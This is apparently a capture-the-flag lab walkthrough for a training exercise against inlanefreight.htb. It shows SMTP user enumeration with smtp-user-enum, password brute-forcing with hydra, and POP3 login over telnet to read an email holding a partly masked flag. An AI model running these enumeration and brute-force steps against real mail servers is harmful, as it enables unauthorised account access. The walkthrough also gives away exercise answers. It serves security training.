Questions:
What is the available username for the domain inlanefreight.htb in the SMTP server?
Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.
Step 1: Edit the Hosts File
First, add the target IP and domain to the /etc/hosts
file for easier access:
sudo nano /etc/hosts
Add the following line with the target IP:
10.129.xxx.xxx inlanefreight.htb
Step 2: Download Users and Passwords Lists from Resources
Ensure you have the necessary user and password lists available for enumeration and brute-forcing.
Step 3: Enumerate SMTP Users
Use smtp-user-enum
to find valid users on the SMTP server:
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t $TARGET_IP
This reveals the username: m*****@inlanefreight.htb
.
Step 4: Brute-force the Password
Use hydra
to brute-force the password for the discovered user:
hydra -l m*****@inlanefreight.htb -P pswd.txt -f $TARGET_IP smtp
The password is found: po*****r
.
Step 5: Access the Email Account
Use telnet
to access the POP3 service and read emails:
telnet -l m*****@inlanefreight.htb $TARGET_IP 110
Log in with the credentials:
user m*****@inlanefreight.htb
+OK Send your password
pass po*****r
+OK Mailbox locked and ready
Step 6: List and Read the Email
List the emails in the mailbox:
list
+OK 1 messages (601 octets)
1 601
Read the email:
retr 1
Output & Flag:
Return-Path: m*****@inlanefreight.htb
Received: from [10.10.14.33] (Unknown [10.10.14.33])
by WINSRV02 with ESMTPA
; Wed, 20 Apr 2022 14:49:32 -0500
Message-ID: <85cb72668d8f5f8436d36f085e0167ee78cf0638.camel@inlanefreight.htb>
Subject: Password change
From: marlin <m*****@inlanefreight.htb>
To: administrator@inlanefreight.htb
Cc: m*****@inlanefreight.htb
Date: Wed, 20 Apr 2022 15:49:11 -0400
Content-Type: text/plain; charset="UTF-8"
User-Agent: Evolution 3.38.3-1
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Hi admin,
How can I change my password to something more secure?
flag: HTB{w**k_p******d}
By following these steps, you can successfully enumerate, brute-force, and access an email account to retrieve important information.
Top comments (0)